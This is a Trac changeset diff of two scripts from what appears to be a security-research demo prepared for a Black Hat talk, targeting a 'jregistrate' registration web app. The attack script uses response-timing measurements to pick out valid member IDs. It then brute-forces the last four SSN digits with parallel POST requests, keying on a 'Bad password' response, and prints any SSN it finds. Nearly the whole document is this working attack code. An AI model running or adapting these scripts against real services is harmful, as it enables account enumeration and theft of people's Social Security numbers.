Changeset 18
- Timestamp:
- 08/01/15 19:04:49 (9 years ago)
- Files:
-
- 2 added
- 2 edited
Legend:
- Unmodified
- Added
- Removed
-
test/blackhat-demo/jregistrate-attack
r15 r18 43 43 parser.add_argument('port', nargs='?', type=int, default=8080, 44 44 help='TCP port number of HTTP service (default: 8080)') 45 parser.add_argument('guess', nargs='?', type=str, default=None, 46 help='Retry a member_id guess') 45 47 options = parser.parse_args() 46 48 … … 75 77 session = requests.Session() 76 78 response = session.send(req, verify=False) 77 #print(repr(response.raw._original_response.local_address))78 79 reported = extractReportedRuntime(response.headers, response.text) 79 80 retry = False … … 82 83 time.sleep(1.0) 83 84 sys.stderr.write("ERROR: retrying...\n") 84 #print(data.encode('utf-8'), reported)85 85 86 86 return {'userspace_rtt':response.elapsed.microseconds*1000, … … 103 103 104 104 105 def guessSSN(member_id, last_four): 106 method = 'POST' 107 path = '/jregistrate/register' 108 url = "%s://%s:%d%s" % (protocol,hostname,port,path) 109 headers = {"Content-Type":"application/x-www-form-urlencoded"} 110 body = (b'member_id='+member_id.encode('utf-8')+b'&last_four='+last_four.encode('utf-8')+b'&username=bob&password=1234&conf_pwd=4321') 111 req = requests.Request(method, url, headers=headers, data=body).prepare() 112 session = requests.Session() 113 response = session.send(req, verify=False) 114 115 if 'Bad password' in response.text: 116 return True 117 else: 118 return False 119 120 121 def bruteSSN(member_id): 122 from nanownlib.parallel import WorkerThreads 123 wt = WorkerThreads(4, guessSSN) 124 125 for last_four in range(9999): 126 ssn = "%4d" % last_four 127 wt.addJob(ssn, (member_id,ssn)) 128 129 for i in range(9999): 130 ssn,success = wt.resultq.get() 131 if success: 132 wt.stop() 133 return ssn 134 135 wt.stop() 136 return None 137 138 105 139 setCPUAffinity() 106 140 setTCPTimestamps() … … 109 143 110 144 cases = {"invalid":"0012-9999"} 111 guesses = [("0012-% d"%id) for id in range(0,9999) if id != 2019]145 guesses = [("0012-%04d"%id) for id in range(0,9999) if id != 2019] 112 146 random.shuffle(guesses) 113 num_observations = 100147 num_observations = 250 114 148 trim = (0,0) 115 classifier = " septasummary"116 params = {"distance": 25, "threshold": 40094.274}149 classifier = "quadsummary" 150 params = {"distance": 5, "threshold": 18761.53575} 117 151 classifierTest = functools.partial(classifiers[classifier]['test'], params, True) 118 152 153 if options.guess != None: 154 guesses = [options.guess] 119 155 120 156 sid = findMaxSampleID(db) + 1 121 157 for guess in guesses: 122 158 print("Collecting samples for:", guess) 159 start = time.time() 123 160 cases["valid"] = guess 124 stype = "attack_%s " % guess161 stype = "attack_%s_%d" % (guess, int(time.time()*1000)) 125 162 sample_order = list(cases.items()) 126 163 … … 147 184 sniffer_fp.close() 148 185 num_probes = analyzeProbes(db, trim=trim) 149 print("num_probes: ", num_probes)150 186 151 187 if classifierTest(db.subseries(stype, "valid")): 152 print("Found valid member_id: ", guess) 153 break 154 155 156 def guessSSN(member_id, last_four): 157 method = 'POST' 158 path = '/jregistrate/register' 159 url = "%s://%s:%d%s" % (protocol,hostname,port,path) 160 headers = {"Content-Type":"application/x-www-form-urlencoded"} 161 body = (b'member_id='+member_id.encode('utf-8')+b'&last_four='+last_four.encode('utf-8')+b'&username=bob&password=1234&conf_pwd=4321') 162 req = requests.Request(method, url, headers=headers, data=body).prepare() 163 session = requests.Session() 164 response = session.send(req, verify=False) 165 166 if 'Bad password' in response.text: 167 return True 188 print(" Looks valid...") 189 ssn = bruteSSN(guess) 190 if ssn == None: 191 print(" Hmm, didn't find an SSN... ") 192 else: 193 print(" W00t! Found SSN: %s" % ssn) 168 194 else: 169 return False 170 171 172 print(guessSSN('0012-5969', '4298')) 173 sys.exit(0) 174 175 for last_four in range(9999): 176 if guessSSN(guess, "%4d" % last_four): 177 print("Found valid SSN last four digits:", last_four) 178 break 195 print(" Looks invalid") 196 print(" Runtime: ", time.time()-start) -
test/blackhat-demo/jregistrate-collect
r15 r18 34 34 parser = argparse.ArgumentParser( 35 35 description="") 36 parser.add_argument('-c', dest='cases', type=str, default='{"valid":"0012-5969","invalid":"0012-9999"}', 37 help='JSON representation of echo timing cases.') 38 parser.add_argument('--no-tcpts', action='store_true', help='Disbale TCP timestamp profiling') 36 parser.add_argument('--no-tcpts', action='store_true', help='Disable TCP timestamp profiling') 39 37 parser.add_argument('--no-control', action='store_true', help='Do not collect separate control data. Instead, synthesize it from test and train data.') 40 38 parser.add_argument('session_name', default=None, … … 55 53 protocol = 'http' 56 54 57 cases = json.loads(options.cases)55 cases = {"valid":"0012-8846","invalid":"0012-9999"} 58 56 59 57 … … 69 67 70 68 71 def sendRequest( data=None):69 def sendRequest(case_data): 72 70 method = 'POST' 73 71 path = '/jregistrate/register' 74 72 url = "%s://%s:%d%s" % (protocol,hostname,port,path) 75 73 headers = {"Content-Type":"application/x-www-form-urlencoded"} 76 body = (b'member_id='+ data.encode('utf-8')+b'&last_four=1111&zip_code=97219&username=bob&password=&conf_pwd=')74 body = (b'member_id='+case_data.encode('utf-8')+b'&last_four=1111&zip_code=97219&username=bob&password=&conf_pwd=') 77 75 req = requests.Request(method, url, headers=headers, data=body).prepare() 78 76 … … 82 80 session = requests.Session() 83 81 response = session.send(req, verify=False) 84 #print(repr(response.raw._original_response.local_address))85 82 reported = extractReportedRuntime(response.headers, response.text) 86 83 retry = False … … 89 86 time.sleep(1.0) 90 87 sys.stderr.write("ERROR: retrying...\n") 91 #print(data.encode('utf-8'), reported)92 88 93 89 return {'userspace_rtt':response.elapsed.microseconds*1000, … … 170 166 sample_order[i] = (sample_order[i][0],sample_order[0][1]) 171 167 random.shuffle(sample_order) 172 #print('after', sample_order)173 168 174 169 results = [] … … 179 174 sample_order[i][1])) 180 175 181 #print(results)182 176 db.addProbes(results) 183 177 db.conn.commit() … … 185 179 186 180 if (time.time() > next_report): 187 #s = time.time()188 181 reportProgress(db, sample_types, start) 189 #print("reportProgress time:", time.time()-s)190 182 next_report += report_interval 191 183 … … 194 186 stopSniffer(sniffer) 195 187 196 start = time.time()197 188 associatePackets(sniffer_fp, db) 198 189 sniffer_fp.close() 199 end = time.time()200 print("associate time:", end-start)201 190 202 191 if options.no_control:
Note: See TracChangeset
for help on using the changeset viewer.